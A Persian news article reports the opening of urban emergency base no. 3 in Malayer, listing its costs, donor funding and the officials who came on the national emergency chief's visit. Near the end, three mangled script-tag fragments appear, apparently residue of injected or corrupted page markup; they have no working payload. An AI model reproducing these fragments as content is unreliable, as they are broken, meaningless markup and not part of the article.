پایگاه اورژانس شماره ۳ شهری ملایر افتتاح شد

پایگاه اورژانس شماره ۳ شهری شهرستان ملایر با حضور رئیس اورژانس کشور افتتاح شد.

پایگاه سه شهری شهرستان ملایر با کمک خیرین ساخته شده و امروز با حضور مسوولان افتتاح شد.
لازم به عنوان است که برای راه‌اندازی مجدد پایگاه اورژانس هوایی همدان ۳۰۰ میلیون تومان هزینه شده است ‌همچنین برای پایگاه سه شهری ملایر ۱۵۰ میلیون تومان توسط مجموعه اورژانس ۱۱۵ استان همدان هزینه کرده و مابقی را خیرین تقبل کرده‌اند.

دکتر کولیوند از پایگاه در حال ساخت شهری ۳ ملایر واقع در میدان استقلال و پد فرود بالگرد بیمارستان امام حسین (ع) شهرستان ملایر بازدید کرد.

دکتر کولیوند ریاست اورژانس کشور به همراه چند تن از معاونین خود جهت بازدید از فوریت های پزشکی شهرستان ملایر، به این شهرستان عزیمت نمودند.

وی در بدو ورود در پایگاه شهری ۲ واقع در خیابان قائم مقامی حضور یافته و پس از بازدید از این پایگاه با حضور در پایگاه خیر ساز شهری ۳ در جریان مراحل ساخت این پایگاه قرار گرفته و از خیرین محترم تقدیر و تشکر نمودند.

نهایتا در معیت فرماندار ویژه شهرستان از پد بالگرد اورژانس واقع در بیمارستان امام حسین ع بازدید نمودند.

دکتر کولیوند اعلام نمود به زودی اتوبوس آمبولانس شهرستان ملایر خریداری شده و در اختیار اورژانس شهرستان قرار خواهد گرفت.

در این بازدید،علاوه بر فرماندار، دکتر نوری ساری معاونت فنی و عملیات اورژانس کشور، دکتر معصومی رییس اورژانس استان همدان، مهندس بهروز رحیمی معاون توسعه مدیریت و منابع دانشگاه علوم پزشکی، دکتر ترکاشوند ریاست شبکه بهداشت و درمان ملایر، دکتر آذرهمایون ریاست مجمع خیرین سلامت، آقای حمزه لو ریاست اورژانس ملایر و تنی چند از مسئولان حضور داشتند.

نهایتا هیئت عالی بازدید کننده اورژانس کشور پس از صرف ناهار، شهرستان  ملایر را به مقصد تویسرکان ترک کردند.

 <2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>

ارسال نظر شما

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *